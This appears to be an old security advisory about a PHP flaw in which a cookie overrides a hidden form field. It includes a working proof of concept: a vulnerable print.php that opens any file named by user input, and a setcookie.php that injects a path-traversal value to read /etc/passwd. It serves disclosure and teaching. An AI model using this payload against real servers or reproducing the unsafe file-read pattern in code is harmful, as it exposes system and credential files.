#php exploit by Daniel Phoenix

synopsis: problem exists where users can change values of variables   in 
forms by simply
          setting a cookie. I can only see this as a real problem where a 
programmer
          explicitly sets hidden fields he does not want the user to change.

Solution: Don't ever assume hidden fields are secure variables.


-------------------------------------example 
exploit----------------------------------------------

ok first run form.php
hit enter and it should open a file called list.txt
---
ok now run setcookie.php

now it does not matter what you enter in form because
$test variable set in cookies will overide anything passed
from the form.Run the form again
--your password file comes up.

----------------------------------form.php---------------------------------------------------------
<form action="print.php">
<input type="hidden" name="test" value="list.txt">
<input type="SUBMIT" name="whatever" value="let me see the file">
</form>
---------------------------------list.txt---------------------------------------------------------
test
test
test
test
test
test
test
test
test
test-------------------------------print.php---------------------------------------------------------
<?
$myfile=fopen($test,"r");
fpassthru("$myfile");
?>
------------------------------setcookie.php-----------------------------------------------------
<?
setcookie("test","../../../../../../etc/passwd");
echo "cookie inserted";
?>



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com